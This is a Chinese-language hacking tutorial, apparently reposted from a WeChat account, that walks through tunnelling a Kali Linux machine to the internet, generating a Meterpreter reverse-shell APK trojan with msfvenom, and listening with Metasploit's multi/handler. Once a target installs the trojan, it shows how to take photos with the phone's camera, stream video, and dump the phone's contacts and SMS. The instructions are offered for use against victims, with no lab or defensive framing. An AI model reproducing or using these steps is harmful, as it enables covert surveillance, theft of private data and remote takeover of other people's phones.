简介
Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版它被认为是最好的渗透测试的 Linux 发行版之一而且名副其实。
Kali常用配置和基本使用
1.外网步骤思想图
Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送exe---->点击test.apk
1.根据攻击机系统情况下载客户端版本这里下载Linux 64bita版本
2. 拖入虚拟器托不进去看上一个教程 解压zip
3.进入解压好的目录报错Tcp就重新去Ngrok重新换一个隧道免费很多人用
./sunny clientid id =>隧道id
启动了当前窗口不要关闭
3、MSF生成外网木马
不加Tcp| 端口不然报错
msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk
4、打开msf设置payload加载攻击模块设置本地IP和监听端口
msfconsole 开启
5.绑定当前端口Ip
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 当前Ip Kali
set LPORT 4444
-
show options 08;查看IP端口设置情况09;
-
-
run开启监听
-
6.等待对方点击test.apk木马病毒
成功就有meterpreter命令行 执行命令即可
sysinfo //查看手机信息
app_list //查看手机app信息
webcam_snap //拍照
保存到此目录
成功拍照。
我的手机拍照过程有声音
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
入侵手机并监控其摄像头的方法如下:
确保Kali和手机在同一网络段,并连接到同一Wi-Fi网络。在Kali的网络适配器中选择桥接模式,并输入`dhclient`命令重新分配IP地址,以确保与手机处于同一网段。
在Kali终端输入`msfconsole`命令启动Metasploit框架。
使用`msfvenom`生成一个预设向连接Kali主机的Android木马应用。输入命令`msfvenom -p android/meterpreter/reverse_tcp LHOST=你的Kali的IP LPORT=5555`,然后选择一个payload,例如`android/meterpreter/reverse_tcp`,并设置本地监听主机的IP和端口。
运行`exploit`命令开始监听,等待手机上线。
手机上线后,将其中的`apk`文件安装到手机上。
在手机上安装木马应用后,可以使用Metasploit的命令行对手机进行操作,例如查看手机信息(`sysinfo`)、开启摄像头(`webcam_stream`)、拍照(`webcam_snap`)、导出联系人信息(`dump_contacts`)、短信记录(`dump_sms`)等。
我就知道你“在看”
原文始发于微信公众号(黑客技术家园):kali Linux外网渗透控制Android安卓手机系统。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论